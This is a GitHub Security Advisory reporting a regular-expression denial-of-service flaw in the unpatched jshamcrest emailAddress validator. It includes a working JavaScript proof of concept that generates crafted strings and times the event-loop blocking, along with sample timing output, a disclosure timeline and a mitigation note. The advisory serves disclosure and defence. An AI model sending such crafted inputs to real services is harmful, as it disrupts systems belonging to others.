GHSA-xj62-87pg-vcv3
GitHub Security Advisory
Regular Expression Denial of Service in jshamcrest
Advisory Details
The `jshamcrest` package is affected by a regular expression denial of service vulnerability when certain types of user input are passed in to the emailAddress validator.
## Proof of concept
```js
var js = require('jshamcrest')
var emailAddress = new js.JsHamcrest.Matchers.emailAddress();
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=1;i<=10000000;i=i+1) {
console.log("COUNT: " + i);
var str = '66666666666666666666666666666@ffffffffffffffffffffffffffffffff.' + genstr(i, 'a') + '{'
console.log("LENGTH: " + str.length);
var start = process.hrtime();
emailAddress.matches(str)
var end = process.hrtime(start);
console.log(end);
}
```
### Results
It takes about 116 characters to get a 1.6 second event loop block.
```
[ 1, 633084590 ]
COUNT: 51
LENGTH: 116
```
# Timeline
- October 25, 2015 - Vulnerability Identified
- October 25, 2015 - Maintainers notified (no response)
## Recommendation
The `jshamcrest` package currently has no patched versions available.
At this time, the best available mitigation is to use an alternative module that is actively maintained and provides similar functionality. There are [multiple modules fitting this criteria available on npm.](https://www.npmjs.com/search?q=validator).
Affected Packages
Related CVEs
Key Information
Dataset
Data from GitHub Advisory Database. This information is provided for research and educational purposes.